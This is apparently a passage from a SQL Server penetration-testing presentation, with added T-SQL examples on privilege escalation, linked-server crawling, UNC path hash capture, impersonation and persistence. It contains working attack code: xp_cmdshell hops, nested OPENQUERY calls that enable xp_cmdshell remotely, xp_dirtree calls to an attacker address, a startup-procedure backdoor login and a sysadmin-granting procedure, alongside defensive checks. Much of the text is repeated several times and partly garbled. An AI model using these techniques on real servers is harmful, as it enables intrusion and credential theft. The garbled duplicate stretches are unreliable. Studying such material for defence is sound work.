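-- connection (-E) to any other instance that grants that account sysadmin needs no password.
EXEC master..xp_cmdshell
    'sqlcmd -E -S SQLSRV02 -Q "SELECT @@SERVERNAME AS server, SYSTEM_USER AS login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin"';

-- Same hop, now gathering data: the remote instance''s databases and SQL logins come back as rows.
EXEC master..xp_cmdshell
    'sqlcmd -E -S SQLSRV02 -Q "SET NOCOUNT ON; SELECT name FROM sys.databases; SELECT name FROM sys.sql_logins"';
```

One caveat for the is_sysadmin check: on SQL Server 2012 and later the default sysadmin membership is granted to the per-service SID (NT SERVICE\MSSQLSERVER) rather than to the domain account, so the hop works where the shared domain account was also given an explicit login on the target, which in practice it frequently is. The first query, run across the fleet, is the quickest way to see how far one compromised service account reaches.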
Escalating Privileges: Crawling Server Links
What's a database link?
Database links (linked servers) are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation.
• The public role can use links to execute queries on remote servers in the context of the login configured on the link (impersonation):
    SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@VERSION')
• Stored procedures can be executed through links (xp_cmdshell)
• Links can be crawled (link to link to link)
[Diagram: Leveraging MS SQL Database links. Zones: Internet, DMZ, Intranet (ADS). Web tier reachable on ports 80 and 443; SQL Server on ports 1433 and 1434. Key: HVA = High Value Application, LVA = Low Value Application. The attacker (Captain Evil) proceeds in two steps: 1. SQL injection against the LVA reaches DB1; 2. From DB1, a DB link configured with least privileges leads to a DB link configured with the SA account, so SQL queries and local commands are executed on database servers via nested linked servers.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of the environments we've seen.
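Enumerating the links on the current server, testing the context they hand out, and following them one and two hops out, as an added example that is not the deck's own code. Assumed link names: SQLSERVER2 defined on the local server and SQLSERVER3 defined on SQLSERVER2.

```sql
-- Added example (not from the deck): manual link crawl in T-SQL.

-- Links, the login each maps to, and whether procedures can be run through them.
SELECT s.name AS link_name, s.data_source, s.is_rpc_out_enabled,
       ll.remote_name          AS remote_login,    -- fixed login used for every caller, or
       ll.uses_self_credential                     -- 1 = the caller's own Windows credential is passed through
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- The context on the far side belongs to the link, not to the caller: a public-role
-- user gets whatever the link's remote login has.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT @@SERVERNAME AS hop1, SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS remote_sysadmin');

-- Second hop: the inner query is a string inside a string, so single quotes double at each level.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT * FROM OPENQUERY([SQLSERVER3],
        ''SELECT @@SERVERNAME AS hop2, SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''''sysadmin'''') AS remote_sysadmin'')');

-- Where the remote login is sysadmin and RPC Out is enabled, procedures run on the far server too.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
       EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;
       EXEC master..xp_cmdshell ''whoami'';') AT [SQLSERVER2];
```

A link whose remote_login is sa (or any sysadmin) with uses_self_credential = 0 is the one that turns a public-role foothold into sysadmin on the next server; a link with uses_self_credential = 1 only carries the caller's own rights. PowerUpSQL's Get-SQLServerLinkCrawl automates the hop-by-hop walk that the nested OPENQUERY calls do by hand here.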
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Oh yeah...
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
• xp_dirtree
• xp_fileexist
So in summary...
The PUBLIC role can obtain the SQL Server service account's NetNTLM password hash by default.
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive.
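The two public-role procedures used to force the service account to authenticate outbound, followed by the checks and the fix a defender applies, as an added example that is not the deck's own code. The attacker address 192.168.1.4 is assumed, with an SMB listener such as Responder or Inveigh on it to capture the NetNTLM exchange.

```sql
-- Added example (not from the deck): UNC path injection and its clean-up.

-- Attack, from any login (public role is enough). The share does not have to exist;
-- the service account authenticates to the host before it learns that.
EXEC master..xp_dirtree   '\\192.168.1.4\share', 1, 1;
EXEC master..xp_fileexist '\\192.168.1.4\share\file.txt';

-- Defender check 1: who may execute the file-path procedures in master?
-- A grantee of "public" is the out-of-the-box state.
SELECT OBJECT_NAME(p.major_id)            AS procedure_name,
       USER_NAME(p.grantee_principal_id)  AS grantee,
       p.permission_name, p.state_desc
FROM master.sys.database_permissions p
WHERE p.class = 1
  AND p.major_id IN (OBJECT_ID('master.dbo.xp_dirtree'),
                     OBJECT_ID('master.dbo.xp_fileexist'));

-- Defender check 2: the account whose NetNTLM hash is at stake (SQL Server 2008 R2 SP1 and later).
SELECT servicename, service_account FROM sys.dm_server_services;

-- Fix: take the procedures away from public. Test first; a few applications and
-- maintenance scripts call xp_dirtree to browse backup folders.
USE master;
REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree   FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_fileexist FROM public;
```

Revoking the two grants closes the default path, not the technique: any procedure that takes a file path and that a login is allowed to run (BULK INSERT, backup and restore commands, OPENROWSET with BULK) does the same thing, so the durable fixes are a low-privilege service account per instance, SMB signing on the servers the account could be relayed to, and egress filtering of SMB from database hosts.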
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways.
2. All SQL Server versions provide the service account with sysadmin privileges.
Below are some options for leveraging that knowledge.

    Approach               2000   2005   2008   2012   2014   2016
    LSA Secrets             x      x      x      x      x      x
    Local Administrator     x      x
    LocalSystem             x      x      x
    Process Migration       x      x      x      x      x      x
    Token Stealing          x      x      x      x      x      x
    Single User Mode               x      x      x      x      x

Here are some tool options:

    Approach                                                       Common Tools
    Access as Local Administrator                                  Management Studio, sqlcmd, and other native SQL client tools
    Access as LocalSystem                                          PsExec, accessibility options debugger, with native SQL client tools
    Recover SQL Server service account password from LSA Secrets   Mimikatz, Metasploit lsadump
    Inject shellcode or DLL into the SQL Server service process    Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
    Steal authentication token from SQL Server service process     Metasploit Incognito, Invoke-TokenManipulation
    Single User Mode                                               DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
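The SQL Server-layer persistence points from item 1, shown once as an attacker plants the simplest of them and once as a defender inventories all three, as an added example that is not the deck's own code. Assumed names: a procedure master.dbo.usp_persist and a login DOMAIN\backdoor.

```sql
-- Added example (not from the deck): SQL Server-layer persistence and its inventory.

-- Attacker: a startup procedure runs as the service account every time the instance starts.
USE master;
GO
CREATE PROCEDURE dbo.usp_persist
AS
BEGIN
    -- Re-create the sysadmin login if someone removed it.
    IF NOT EXISTS (SELECT 1 FROM sys.server_principals WHERE name = N'DOMAIN\backdoor')
        CREATE LOGIN [DOMAIN\backdoor] FROM WINDOWS;
    EXEC sp_addsrvrolemember N'DOMAIN\backdoor', N'sysadmin';
END
GO
EXEC sp_procoption @ProcName = N'dbo.usp_persist', @OptionName = 'startup', @OptionValue = 'on';
GO

-- Defender inventory: run on every instance and diff against a known-good baseline.
-- 1. Startup procedures (only procedures in master can be marked startup).
SELECT name AS startup_procedure
FROM master.sys.procedures
WHERE OBJECTPROPERTY(object_id, 'ExecIsStartup') = 1;

-- 2. Server-scoped triggers (logon and DDL triggers) together with their code.
SELECT t.name, t.type_desc, t.is_disabled, m.definition
FROM sys.server_triggers t
JOIN sys.server_sql_modules m ON m.object_id = t.object_id;

-- 3. Agent jobs that run OS or PowerShell steps, or that sa does not own (sa's SID is 0x01).
SELECT j.name AS job_name, j.enabled, SUSER_SNAME(j.owner_sid) AS owner,
       s.step_name, s.subsystem, s.command
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell') OR j.owner_sid <> 0x01;
```

The three queries cover the SQL Server side of the slide's list; "modified code" needs a baseline of module definitions (sys.sql_modules per database) to diff against, and the OS-layer items are outside the database entirely. A startup procedure is the quietest of the three because it leaves no job history and no trigger event, so the first query is the one to schedule.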
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2. Get the principal id for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just the principal ID
4. Increment the number and repeat

select n [id], SUSER_NAME(n) [user_name]
from (
    select top 10000 row_number() over(order by t1.number) as N
    from master..spt_values t1 cross join master..spt_values t2
) a
where SUSER_NAME(n) is not null

Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges: Weak Passwords
3. Grab the first 48 bytes of the full RID
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO
SYSADMIN is often the OWNER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
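The seven signing steps above carried through in T-SQL, as an added example that is not code from the slides or from PowerUpSQL. MyAppDb, MyAppUser, usp_ActiveSessions, SigningCert, SigningLogin, the password and the export path are placeholders; the procedure needs VIEW SERVER STATE, a server-level permission, which is why the certificate is also copied into master.

```sql
-- Added example (not from the original slides or PowerUpSQL): the signed-procedure
-- pattern end to end. All names, the password and the file path are placeholders.
USE MyAppDb;
GO
-- Step 1: the procedure. No EXECUTE AS clause, so it runs as the caller; the one
-- extra permission it needs will come from the signature, not from an owner context.
CREATE PROCEDURE dbo.usp_ActiveSessions
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions          -- requires VIEW SERVER STATE
    WHERE is_user_process = 1;
END
GO
-- Step 2: database master key, which protects the certificate's private key
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<replace-with-a-strong-password>';
GO
-- Step 3: certificate used only for signing code in this database
CREATE CERTIFICATE SigningCert
    WITH SUBJECT = 'Signs dbo.usp_ActiveSessions';
GO
-- Step 4: a login can only be created from a certificate that lives in master,
-- so export the public part and import it there (no private key leaves MyAppDb).
BACKUP CERTIFICATE SigningCert TO FILE = 'C:\Secure\SigningCert.cer';
GO
USE master;
GO
CREATE CERTIFICATE SigningCert FROM FILE = 'C:\Secure\SigningCert.cer';
GO
CREATE LOGIN SigningLogin FROM CERTIFICATE SigningCert;   -- cannot be used to connect
GO
-- Step 5: grant exactly the permission the procedure needs, nothing broader
GRANT VIEW SERVER STATE TO SigningLogin;
GO
USE MyAppDb;
GO
-- Step 6: sign the procedure. Only this procedure body inherits the login's
-- permission, and ALTER PROCEDURE drops the signature, which is the point.
ADD SIGNATURE TO dbo.usp_ActiveSessions BY CERTIFICATE SigningCert;
GO
-- Step 7: callers get EXECUTE on the procedure and nothing else
GRANT EXECUTE ON dbo.usp_ActiveSessions TO MyAppUser;
GO
```

Compared with the sp_escalate_me pattern, a caller of usp_ActiveSessions gains VIEW SERVER STATE for the duration of that body only, and TRUSTWORTHY stays OFF.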
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
